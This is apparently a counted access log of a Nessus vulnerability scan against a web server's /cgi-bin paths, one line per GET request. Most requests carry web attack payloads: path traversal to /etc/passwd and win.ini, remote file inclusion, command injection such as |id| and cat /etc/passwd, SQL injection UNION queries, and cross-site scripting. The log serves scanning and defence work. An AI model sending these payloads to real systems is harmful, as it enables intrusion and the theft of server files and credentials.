1 GET /cgi-bin/admin/admin.php?sid=' HTTP/1.1
1 GET /cgi-bin/admin/admin.php?sid=0' HTTP/1.1
3 GET /cgi-bin/admin/admin.php HTTP/1.1
1 GET /cgi-bin/admin/backup.php HTTP/1.1
1 GET /cgi-bin/admin/cal_login.php HTTP/1.1
1 GET /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1717627950 HTTP/1.1
1 GET /cgi-bin/admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/admin/connect.inc HTTP/1.1
1 GET /cgi-bin/admin/define.inc.php?match=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd|| HTTP/1.1
1 GET /cgi-bin/admin/index.html HTTP/1.1
1 GET /cgi-bin/admin/index.php?act=login&username='%20UNION%20SELECT%201,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus HTTP/1.1
1 GET /cgi-bin/admin/index.php?cmd=login HTTP/1.1
1 GET /cgi-bin/admin/index.php?username=advanced_poll_var_overwrite.nasl&pollvars[poll_username]=advanced_poll_var_overwrite.nasl&password=267562389&pollvars[poll_password]=b21694c6b40792c1311e2e8748d21e2a HTTP/1.1
1 GET /cgi-bin/admin/ip_manage.php HTTP/1.1
1 GET /cgi-bin/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][cmsmadesimple_nls_file_include.nasl][1]=/etc/passwd&nls[file][cmsmadesimple_nls_file_include.nasl][2]=../COPYING HTTP/1.1
1 GET /cgi-bin/admin/login-default.do HTTP/1.1
2 GET /cgi-bin/admin/login.html HTTP/1.1
2 GET /cgi-bin/admin/login.php HTTP/1.1
1 GET /cgi-bin/admin/login/ HTTP/1.1
1 GET /cgi-bin/admin/o12guest.mdb HTTP/1.1
1 GET /cgi-bin/admin/objects.inc.php4?Server[path]=http[:]//example[.]com&Server[language_file]=nessus.php HTTP/1.1
1 GET /cgi-bin/admin/operators.php?view HTTP/1.1
1 GET /cgi-bin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/admin/remotecontrol/lsrc.server.php?wsdl HTTP/1.1
1 GET /cgi-bin/admin/setup.php HTTP/1.1
1 GET /cgi-bin/admin/templates/header.php?admin_root=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/admin/users.php HTTP/1.1
7 GET /cgi-bin/admin HTTP/1.1
1 GET /cgi-bin/admincp/login.php HTTP/1.1
7 GET /cgi-bin/administrator.cgi HTTP/1.1
2 GET /cgi-bin/administrator/index.php HTTP/1.1
1 GET /cgi-bin/administrator/manifests/files/joomla.xml HTTP/1.1
7 GET /cgi-bin/administrator HTTP/1.1
1 GET /cgi-bin/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem%28id%29%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
1 GET /cgi-bin/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/adodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /cgi-bin/adxmlrpc.php HTTP/1.1
1 GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /cgi-bin/agenda.php3 HTTP/1.1
7 GET /cgi-bin/agorn.cgi HTTP/1.1
1 GET /cgi-bin/ajax.php?rs=__exp__getFeedContent&rsargs[]=-99%20UNION%20SELECT%201758880185%2c2%2c235810029%2c4%2c5%2c6%2c7%2c8%2c9%2c0%2c1%2c2%2c3%20-- HTTP/1.1
1 GET /cgi-bin/al_initialize.php?alpath=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/album.pl?function=about HTTP/1.1
1 GET /cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd HTTP/1.1
1 GET /cgi-bin/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
1 GET /cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/ HTTP/1.1
1 GET /cgi-bin/api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
1 GET /cgi-bin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../windows/win.ini HTTP/1.1
1 GET /cgi-bin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /cgi-bin/artifactory/webapp/home.html?0 HTTP/1.1
1 GET /cgi-bin/artifactory/webapp HTTP/1.1
1 GET /cgi-bin/ashnews.php?pathtoashnews=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/athenareg.php?pass=%20;id HTTP/1.1
1 GET /cgi-bin/atmail.pl HTTP/1.1
1 GET /cgi-bin/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.1
2 GET /cgi-bin/authLogin.cgi HTTP/1.1
1 GET /cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/awstats.cgi HTTP/1.1
1 GET /cgi-bin/awstats.pl HTTP/1.1
1 GET /cgi-bin/awstatstotals.php?sort=\"].passthru('id').exit().%24a[\" HTTP/1.1
1 GET /cgi-bin/awstatstotals.php?sort=\"].phpinfo().exit().%24a[\" HTTP/1.1
1 GET /cgi-bin/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
1 GET /cgi-bin/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
1 GET /cgi-bin/axis2-web/index.jsp HTTP/1.1
1 GET /cgi-bin/b2-tools/gm-2-b2.php?b2inc=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/backend/classes.php?include_path=../lib/jinzora.js%00 HTTP/1.1
1 GET /cgi-bin/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1717627963')</script> HTTP/1.1
2 GET /cgi-bin/base_main.php HTTP/1.1
2 GET /cgi-bin/base_maintenance.php HTTP/1.1
1 GET /cgi-bin/base_qry_common.php?BASE_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/basilix.php HTTP/1.1
1 GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/bb_func_txt.php?pathToFiles=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/bblog/index.php HTTP/1.1
1 GET /cgi-bin/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; HTTP/1.1
1 GET /cgi-bin/billing/billingmanager_income.asp HTTP/1.1
1 GET /cgi-bin/bin/html2text.php HTTP/1.1
1 GET /cgi-bin/bizmail.cgi HTTP/1.1
1 GET /cgi-bin/biztalkhttpreceive.dll HTTP/1.1
1 GET /cgi-bin/blog.cgi?submit=ViewFile&month=01&year=2004&file=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/boarddata/data/user.idx HTTP/1.1
1 GET /cgi-bin/breakcal/calendar.cgi HTTP/1.1
2 GET /cgi-bin/browse.php HTTP/1.1
1 GET /cgi-bin/browse_blogs.php HTTP/1.1
1 GET /cgi-bin/bsml.pl?action=sm HTTP/1.1
1 GET /cgi-bin/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/buddy.php?action=<script>x</script> HTTP/1.1
7 GET /cgi-bin/bugreport.cgi HTTP/1.1
1 GET /cgi-bin/c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
1 GET /cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1717627962 HTTP/1.1
1 GET /cgi-bin/cal_event.php?id=1%27%20UNION%20SELECT%201%2c2%2c%27calendarix_id_sql_injection.nasl%27%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
1 GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/cal_week.php?op=week&catview=999' HTTP/1.1
1 GET /cgi-bin/calendar.php?month=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /cgi-bin/calendar.php?month=&year=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /cgi-bin/calendar.php?serverPath=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
1 GET /cgi-bin/callboth.php?SEQ=654321&OUT=123456&IN=1717627965%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
1 GET /cgi-bin/camctrl.cgi HTTP/1.1
1 GET /cgi-bin/captcha.html HTTP/1.1
1 GET /cgi-bin/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog HTTP/1.1
7 GET /cgi-bin/cart.cgi HTTP/1.1
1 GET /cgi-bin/cart32.exe HTTP/1.1
1 GET /cgi-bin/catalog.php?action=category_show&id=' HTTP/1.1
1 GET /cgi-bin/cc_guestbook.pl HTTP/1.1
1 GET /cgi-bin/cfooter.php3 HTTP/1.1
1 GET /cgi-bin/cgi-bin/gm-comments.cgi HTTP/1.1
1 GET /cgi-bin/cgi-bin/library.cgi HTTP/1.1
2 GET /cgi-bin/cgi-bin/login.cgi HTTP/1.1
1 GET /cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/cgiip.exe/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /cgi-bin/cgiip.exe/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /cgi-bin/cgiwrap/cgiwrap_error_page_handling_xss.nasl HTTP/1.1
1 GET /cgi-bin/chat.php HTTP/1.1
1 GET /cgi-bin/chat/login.php?option=chat HTTP/1.1
1 GET /cgi-bin/ckeditor.js HTTP/1.1
1 GET /cgi-bin/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/classes/adodbt/sql.php?classes_dir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/client_execute.cgi?tUD=0 HTTP/1.1
8 GET /cgi-bin/clwarn.cgi HTTP/1.1
1 GET /cgi-bin/com5.pl HTTP/1.1
1 GET /cgi-bin/comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/comments.php HTTP/1.1
1 GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1
1 GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
1 GET /cgi-bin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=limbo_com_fm_php_shell.nasl-1717627950 HTTP/1.1
1 GET /cgi-bin/config.php?path[docroot]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/config.php?returnpath=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/config/oramon.ini HTTP/1.1
1 GET /cgi-bin/configuration/config.dat HTTP/1.1
1 GET /cgi-bin/configuration/galleryConfig.txt HTTP/1.1
1 GET /cgi-bin/console/login.action HTTP/1.1
1 GET /cgi-bin/contact.php HTTP/1.1
1 GET /cgi-bin/contacts/php?cal_dir=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/content.php?get_action=display_doc&doc_file=CREDITS HTTP/1.1
1 GET /cgi-bin/contrib/forms/evaluation/C_FormEvaluation.class.php?fileroot=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/core/api.php?t_path_core=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/core/editor.php?editor_insert_bottom=/etc/passwd HTTP/1.1
1 GET /cgi-bin/core/misc/drupal.js HTTP/1.1
1 GET /cgi-bin/corporate/webpages/login.jsp HTTP/1.1
1 GET /cgi-bin/corporate/webpages/sessionexpired.jsp HTTP/1.1
7 GET /cgi-bin/count.cgi HTTP/1.1
1 GET /cgi-bin/counter.php?count_log_file=/nessus HTTP/1.1
1 GET /cgi-bin/crossdomain.xml HTTP/1.1
1 GET /cgi-bin/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini HTTP/1.1
1 GET /cgi-bin/csSearch.cgi?command=savesetup&setup=print%20id`` HTTP/1.1
1 GET /cgi-bin/csv_db.cgi?file=|id| HTTP/1.1
1 GET /cgi-bin/ctrldirect.cgi HTTP/1.1
1 GET /cgi-bin/customer.pl HTTP/1.1
1 GET /cgi-bin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1
1 GET /cgi-bin/cvsweb.cgi/ HTTP/1.1
1 GET /cgi-bin/cwmail.exe HTTP/1.1
1 GET /cgi-bin/dada/ HTTP/1.1
1 GET /cgi-bin/dada/mail.cgi HTTP/1.1
1 GET /cgi-bin/data/fetch.php?page=' HTTP/1.1
1 GET /cgi-bin/data/usr HTTP/1.1
2 GET /cgi-bin/day.php HTTP/1.1
2 GET /cgi-bin/db/users.dat HTTP/1.1
1 GET /cgi-bin/db_input.php HTTP/1.1
1 GET /cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/demos/demo.browse.php?filename=/etc/passwd HTTP/1.1
1 GET /cgi-bin/detail.asp?nChannel='1 HTTP/1.1
1 GET /cgi-bin/direct.php?rf=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/disp_album.php?id_album=0+or+1=1 HTTP/1.1
1 GET /cgi-bin/display.cgi?preftemp=temp&page=anonymous&file=|id| HTTP/1.1
1 GET /cgi-bin/doc/index.php?s=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/docbuilder/top.php HTTP/1.1
1 GET /cgi-bin/docman/new.php HTTP/1.1
1 GET /cgi-bin/docs.php?doc=../jpgraph-1.12.1/docs/index HTTP/1.1
1 GET /cgi-bin/docs/CHANGES HTTP/1.1
1 GET /cgi-bin/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/doku.php HTTP/1.1
1 GET /cgi-bin/download.php?language=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/dsweb/Services/User-1%22%3e%3cBODY%20ONLOAD%3dalert%28%27xerox_docushare_dsweb_xss.nasl%27%29%3e HTTP/1.1
1 GET /cgi-bin/dwsync.xml HTTP/1.1
1 GET /cgi-bin/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/e107_admin/admin.php HTTP/1.1
1 GET /cgi-bin/eboard40// HTTP/1.1
1 GET /cgi-bin/eboard40//index2[.]cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/eclient/IDMLogon2.jsp HTTP/1.1
1 GET /cgi-bin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20 HTTP/1.1
1 GET /cgi-bin/editor/filemanager/connectors/php/upload.php?Command=FileUpload&Type=File&CurrentFolder=/fckeditor_currentfolder_file_upload-1717627989.php%2e HTTP/1.1
1 GET /cgi-bin/embed/day.php?path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1
1 GET /cgi-bin/emumail.fcgi HTTP/1.1
1 GET /cgi-bin/encoder.php HTTP/1.1
1 GET /cgi-bin/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/ericom.min.js HTTP/1.1
1 GET /cgi-bin/error.php?err=404 HTTP/1.1
1 GET /cgi-bin/error.php?selected_theme=%3cscript%3ealert%28uebimiau_selected_theme_xss.nasl%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/event_view.php?eid=34%20UNION%20SELECT%202076713815 HTTP/1.1
1 GET /cgi-bin/faq.php?action=&type=view&s=&id=-1%27%20UNION%20SELECT%200%2c308966140%2c0%2c0%2c0%2c0%2c0-- HTTP/1.1
1 GET /cgi-bin/faq.php HTTP/1.1
1 GET /cgi-bin/faq/index.php HTTP/1.1
1 GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.1
7 GET /cgi-bin/faqmanager.cgi HTTP/1.1
1 GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1
1 GET /cgi-bin/fckeditor/editor/filemanager/connectors/connector?Command=CreateFolder&Type=File&CurrentFolder=/%00/&NewFolderName=fckeditor_java_currentfolder_dos.nasl HTTP/1.1
1 GET /cgi-bin/feedsplitter.php?format=../../../../../../../../../../etc/passwd%00&debug=1 HTTP/1.1
1 GET /cgi-bin/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini HTTP/1.1
1 GET /cgi-bin/file.php?path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/filescan HTTP/1.1
1 GET /cgi-bin/flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id| HTTP/1.1
1 GET /cgi-bin/fm.php HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.asp HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.cfm HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.cgi HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.html HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.inc HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.php3 HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.php HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.pl HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.sh HTTP/1.1
1 GET /cgi-bin/foBACcVryQbL.shtml HTTP/1.1
1 GET /cgi-bin/force-download.php HTTP/1.1
1 GET /cgi-bin/form.php HTTP/1.1
1 GET /cgi-bin/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%20524908327-- HTTP/1.1
1 GET /cgi-bin/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script HTTP/1.1
1 GET /cgi-bin/forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull-- HTTP/1.1
1 GET /cgi-bin/forum.php?id_article=1&id_forum=-1/**/UNION/**/SELECT%201736719456-- HTTP/1.1
1 GET /cgi-bin/forum.php HTTP/1.1
1 GET /cgi-bin/forum/Database/EZsiteForum.mdb HTTP/1.1
1 GET /cgi-bin/forum_2.php?msg=10&return=<script>foo</script> HTTP/1.1
1 GET /cgi-bin/forumdata/data/user.idx HTTP/1.1
1 GET /cgi-bin/forumdisplay.php?fid=21\"><script>x</script> HTTP/1.1
1 GET /cgi-bin/forums/list.page HTTP/1.1
1 GET /cgi-bin/foswiki/view/System/WebHome?rev=1 HTTP/1.1
1 GET /cgi-bin/fp/servlet/Login HTTP/1.1
1 GET /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc HTTP/1.1
1 GET /cgi-bin/ftplocate/flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id| HTTP/1.1
1 GET /cgi-bin/fxm.exe HTTP/1.1
1 GET /cgi-bin/gadgets/Blog/BlogModel.php?path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/gallery/displayCategory.php?basepath=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/generate.cgi HTTP/1.1
1 GET /cgi-bin/genindexpage.cgi?4242+Home+/../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/getting_started/macros/macros_detail.dot?id=../../../../../../../../../../../..//etc/passwd%00.html HTTP/1.1
3 GET /cgi-bin/gitweb.cgi HTTP/1.1
3 GET /cgi-bin/gitweb.perl HTTP/1.1
3 GET /cgi-bin/gitweb.pl HTTP/1.1
3 GET /cgi-bin/gitweb/gitweb.cgi HTTP/1.1
3 GET /cgi-bin/gitweb/gitweb.perl HTTP/1.1
3 GET /cgi-bin/gitweb/gitweb.pl HTTP/1.1
1 GET /cgi-bin/gm-comments.cgi HTTP/1.1
1 GET /cgi-bin/gm.cgi HTTP/1.1
1 GET /cgi-bin/go.cgi|id| HTTP/1.1
1 GET /cgi-bin/googlesearch/GoogleSearch.php?APP[path][lib]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/gtcatalog/index.php?function=custom&custom=http[:]//example[.]com/1 HTTP/1.1
1 GET /cgi-bin/gtcatalog/password.inc HTTP/1.1
7 GET /cgi-bin/guestbook.cgi HTTP/1.1
1 GET /cgi-bin/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 HTTP/1.1
2 GET /cgi-bin/guestbook.php HTTP/1.1
1 GET /cgi-bin/guestbook/cfooter.php3 HTTP/1.1
1 GET /cgi-bin/guestbook/view.php?PG=foobar HTTP/1.1
1 GET /cgi-bin/guestimage.html HTTP/1.1
7 GET /cgi-bin/help.cgi HTTP/1.1
1 GET /cgi-bin/help.php?section='qualiteam_xcart_sql_xss.nasl HTTP/1.1
1 GET /cgi-bin/help.php HTTP/1.1
1 GET /cgi-bin/help/copyright.html HTTP/1.1
1 GET /cgi-bin/help/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
1 GET /cgi-bin/help/index.php?help_file=../../../../../../../../../../../etc/passwd HTTP/1.1
7 GET /cgi-bin/hi HTTP/1.1
1 GET /cgi-bin/hints.pl?|id| HTTP/1.1
1 GET /cgi-bin/historyFrame.html HTTP/1.1
1 GET /cgi-bin/home/search.asp?nChannel='1 HTTP/1.1
1 GET /cgi-bin/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
1 GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.1
1 GET /cgi-bin/htmlscript?../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/htsearch.cgi HTTP/1.1
1 GET /cgi-bin/htsearch?-c/nonexistent HTTP/1.1
1 GET /cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=%3cscript%3ealert%28%27htsearch_sort_xss.nasl%27%29%3c%2fscript%3e&words=htsearch_sort_xss.nasl HTTP/1.1
1 GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.1
1 GET /cgi-bin/hw3.cgi?daysonly=0).system('id').( HTTP/1.1
1 GET /cgi-bin/hw3.php?daysonly=0).system(id).( HTTP/1.1
1 GET /cgi-bin/i-mall.cgi?p=|id| HTTP/1.1
1 GET /cgi-bin/ideabox/include.php?ideaDir=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/identity HTTP/1.1
1 GET /cgi-bin/ikonboard.cgi?act=ST&f=1&t=1&hl=nessus&st=' HTTP/1.1
1 GET /cgi-bin/ikonboard.cgi HTTP/1.1
1 GET /cgi-bin/image.php?src=system/config/localconfig.php HTTP/1.1
1 GET /cgi-bin/inc/exif.inc.php?exif_prog=%28echo%20-n%20%27original_exif_prog_cmd_exec.nasl%3a%20%27%3bid%29%7c%7cecho HTTP/1.1
1 GET /cgi-bin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt%00 HTTP/1.1
1 GET /cgi-bin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/inc/header.php/step_one.php?server_inc=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/inc/pipe.php?HCL_path=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/include.php HTTP/1.1
1 GET /cgi-bin/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=alert%28%27fusetalk_mult_xss.nasl%27%29 HTTP/1.1
1 GET /cgi-bin/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=%22%3e%3c%2fa%3e%3cscript%3ealert%28%27fusetalk_mult_xss.nasl%27%29%3c%2fscript%3e%3ca%20href%3d%22 HTTP/1.1
1 GET /cgi-bin/include/error/autherror.cfm?errorcode=1&FTVAR_URLP=%22%3e%3cscript%3ealert%28%27fusetalk_mult_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/include/error/forumerror.cfm?errorno=3 HTTP/1.1
1 GET /cgi-bin/include/help.php?base=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/include/sql.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/include/theme.inc.php?fullpath=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/includer.cgi?template=includer_rcmdexec.nasl HTTP/1.1
1 GET /cgi-bin/includes/awol-condensed.inc.php?path=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/includes/calendar.php?phpc_root_path=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/includes/config.php?relative_script_path=http[:]//example[.]com HTTP/1.1
1 GET /cgi-bin/includes/converter.inc.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/includes/db_adodb.php?baseDir=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/includes/hnmain.inc.php3?config[incdir]=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/includes/main.conf HTTP/1.1
1 GET /cgi-bin/includes/messages.inc.php?include_path=/etc/passwd%00&lan=EN HTTP/1.1
1 GET /cgi-bin/includes/settings.inc.php?include_path=/etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /cgi-bin/index.action HTTP/1.1
1 GET /cgi-bin/index.asp HTTP/1.1
1 GET /cgi-bin/index.cfm?catid=1%20SQL HTTP/1.1
1 GET /cgi-bin/index.cfm?fuseaction=category.display&category_ID=' HTTP/1.1
1 GET /cgi-bin/index.cfm HTTP/1.1
9 GET /cgi-bin/index.cgi HTTP/1.1
1 GET /cgi-bin/index.do HTTP/1.1
2 GET /cgi-bin/index.html HTTP/1.1
1 GET /cgi-bin/index.js%70 HTTP/1.1
3 GET /cgi-bin/index.jsp HTTP/1.1
1 GET /cgi-bin/index.php/admin/ HTTP/1.1
1 GET /cgi-bin/index.php/admin/login/ HTTP/1.1
1 GET /cgi-bin/index.php/index.html HTTP/1.1
1 GET /cgi-bin/index.php/login HTTP/1.1
1 GET /cgi-bin/index.php?/auth/login/ HTTP/1.1
1 GET /cgi-bin/index.php?CID=' HTTP/1.1
1 GET /cgi-bin/index.php?_language=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/index.php?act=Arcade&do=stats&gameid=1' HTTP/1.1
1 GET /cgi-bin/index.php?act=help&do=aboutOAT HTTP/1.1
1 GET /cgi-bin/index.php?act=sm_window&page=event&day=-1%20UNION%20SELECT%201%2c1717627923%2c181305923%20-- HTTP/1.1
1 GET /cgi-bin/index.php?action=Login&module=Users HTTP/1.1
1 GET /cgi-bin/index.php?action=login&languages[Nessus]=syscp_1211.nasl&language=Nessus&langs[Nessus][0][file]=/etc/passwd HTTP/1.1
1 GET /cgi-bin/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1
